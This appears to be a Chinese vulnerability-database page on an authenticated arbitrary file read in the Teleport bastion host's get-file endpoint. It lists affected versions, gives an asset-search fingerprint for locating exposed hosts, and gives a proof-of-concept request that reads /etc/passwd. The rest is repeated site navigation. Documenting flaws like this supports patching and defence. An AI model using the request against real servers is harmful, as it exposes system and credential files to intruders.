Teleport堡垒机 get-file 后台任意文件读取漏洞

漏洞描述

Teleport堡垒机 get-file接口存在后台任意文件读取漏洞，攻击者利用任意用户登录漏洞后可以获取后台权限，再进一步利用任意文件读取获取服务器上的敏感文件

漏洞影响

Teleport Version <= 20220817

网络测绘

app="TELEPORT堡垒机"

漏洞复现

登录页面

登录后使用POC验证

/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0

CMS漏洞

images

OA产品漏洞

images

Web应用漏洞

images

base

grafana

11.0.0

ollama

0.1.33

0.1.45

0.3.14

中间件漏洞

images

云安全漏洞

images

人工智能漏洞

images

其他漏洞

images

开发框架漏洞

images

开发语言漏洞

images

操作系统漏洞

images

数据库漏洞

images

网络设备漏洞

images

Teleport堡垒机 get-file 后台任意文件读取漏洞

漏洞描述

漏洞影响

网络测绘

漏洞复现

images

images

images

grafana

11.0.0

ollama

0.1.33

0.1.45

0.3.14

images

images

images

images

images

images

images

images

images

Teleport堡垒机 get-file 后台任意文件读取漏洞 ​

漏洞描述 ​

漏洞影响 ​

网络测绘 ​

漏洞复现 ​

Teleport堡垒机 get-file 后台任意文件读取漏洞

漏洞描述

漏洞影响

网络测绘

漏洞复现